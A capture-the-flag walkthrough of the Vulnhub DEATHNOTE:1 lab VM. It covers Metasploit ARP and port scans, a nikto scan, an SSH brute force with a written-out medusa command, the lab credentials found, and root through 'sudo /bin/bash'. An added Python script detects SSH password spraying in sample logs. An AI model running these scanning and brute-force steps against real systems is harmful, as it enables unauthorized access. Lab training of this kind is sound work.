Vulnhub Target Machine Series: DEATHNOTE:1
## 0x01 Target Information
> - **Name**: DEATHNOTE:1
> - **Release date**: September 4, 2021
> - **Author**: HWKDS
> - **Series**: Deathnote
> - **Difficulty**: Easy
> - **Description**: Don't waste too much time thinking outside the box. This is a straightforward box.
> - **Download link**: [https://download.vulnhub.com/deathnote/Deathnote.ova](https://download.vulnhub.com/deathnote/Deathnote.ova)
> - **MD5**: D5F6A19BBEA617D7C7C46E21C518F698
> - **Network**: assigned automatically via DHCP
## 0x02 Write-Up
### 2.1 Host Discovery
Run an ARP scan with the msf scanner/discovery/arp_sweep module
``` text
set rhosts 192.168.181.0/24
Set the target network range
```
The ARP scan finds the target machine at 192.168.181.147
### 2.2 Port Scanning with msf
``` text
Use the auxiliary/scanner/portscan/tcp module
set rhosts 192.168.181.147
Set the target address
set ports 1-65535
Set the port range
set threads 50
Set the thread count to 50
```
The scan shows that the target has ports 22 and 80 open
Browsing to the website redirects to a domain name
Add the domain to the hosts file and browse again
On the home page, KIRA and L correspond to two people; KIRA is very likely a site user
``` text
my fav line is iamjustic3
(This is presumably related to the KIRA user and may be a password)
L on i will eliminate you L!
(Meaning: L appears in "i will eliminate you L!")
```
Follow the link to look at the clues about L
``` text
I am light yagami , son of Soichiro Yagami . A great and intelligent person exists on this planet after L . ….
This suggests KIRA is a user created after L, which means L may have higher privileges
```
The HINT page contains a hint
``` text
Find a notes.txt file on server or SEE the L comment
```
### 2.3 Scanning the Website with nikto
The scan finds the upload directory uploads and the login page wp-login.php
Found the notes file and a user file
user.txt holds the usernames
notes.txt is the password file
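### 2.4 Brute-Forcing SSH with medusa
Save the two files and brute-force with medusa
``` text
medusa -h 192.168.181.147 -U test/user.txt -P test/notes.txt -M ssh -f -t 50
-U specifies the username wordlist, -P specifies the password wordlist, -M selects the ssh module, -f stops after the first successful login, -t is the number of threads
```
The brute force finds user l with password death4me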
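Seen from the defender's side, this step leaves a clear trail in the sshd log. The following is an added example, not part of the original write-up: it flags a source address that sprays failed logins across several accounts and reports any account that then logged in. The log lines, the hostname, the 192.0.2.x addresses and the thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sshd log lines (not from the original write-up);
# 192.0.2.x are documentation addresses, the hostname is made up.
SAMPLE_LOG = """\
May 27 10:44:01 deathnote sshd[2101]: Failed password for kira from 192.0.2.10 port 40112 ssh2
May 27 10:44:01 deathnote sshd[2102]: Failed password for invalid user ryuk from 192.0.2.10 port 40114 ssh2
May 27 10:44:02 deathnote sshd[2103]: Failed password for l from 192.0.2.10 port 40118 ssh2
May 27 10:44:02 deathnote sshd[2104]: Failed password for kira from 192.0.2.10 port 40120 ssh2
May 27 10:44:03 deathnote sshd[2105]: Failed password for l from 192.0.2.10 port 40124 ssh2
May 27 10:44:03 deathnote sshd[2106]: Accepted password for l from 192.0.2.10 port 40126 ssh2
May 27 11:02:40 deathnote sshd[2190]: Failed password for kira from 192.0.2.50 port 51812 ssh2
May 27 11:02:48 deathnote sshd[2191]: Accepted password for kira from 192.0.2.50 port 51813 ssh2
"""

# Matches OpenSSH password-auth results, with or without "invalid user".
LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, min_failures=5, min_users=2):
    """Return one finding per source IP that fails logins across several accounts."""
    failures = defaultdict(list)    # ip -> user name of every failed attempt
    compromised = defaultdict(set)  # ip -> users accepted after failures began
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip].append(user)
        elif ip in failures:
            compromised[ip].add(user)  # success that follows failures from same IP
    findings = []
    for ip, users in failures.items():
        if len(users) >= min_failures and len(set(users)) >= min_users:
            findings.append({
                "ip": ip,
                "failures": len(users),
                "users_tried": sorted(set(users)),
                "success_after_failures": sorted(compromised[ip]),
            })
    return findings

if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_LOG):
        print(finding)
```

A single mistyped password followed by a successful login (the 192.0.2.50 lines) stays below both thresholds and is not reported.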
After logging in, there is a user.txt file whose content is encoded as Brainfuck
``` text
i think u got the shell , but you wont be able to kill me -kira
```
This file is of no use, so keep enumerating
Found the user kira; trying to log in with the string iamjustic3 found on the home page failed
Look at the case-file.txt file
``` text
the FBI agent died on December 27, 2006
1 week after the investigation of the task-force member/head.
aka.....
Soichiro Yagami's family .
hmmmmmmmmm......
and according to watari ,
he died as other died after Kira targeted them .
and we also found something in
fake-notebook-rule folder .
```
Look at the fake-notebook-rule file
It hints that we should decode it with CyberChef
There are two layers in total: one hexadecimal layer and one base64 layer
Decoded password: kiraisevil
Log in as kira and find that the account has full sudo privileges
### 2.5 Privilege Escalation
``` text
sudo /bin/bash
```
View kira.txt, which we previously had no permission to read
Base64-decode it
``` text
please protect one of the following
1. L (/opt)
2. Misa (/var)
```
Checked Misa and found it is of no use to us
Got the flag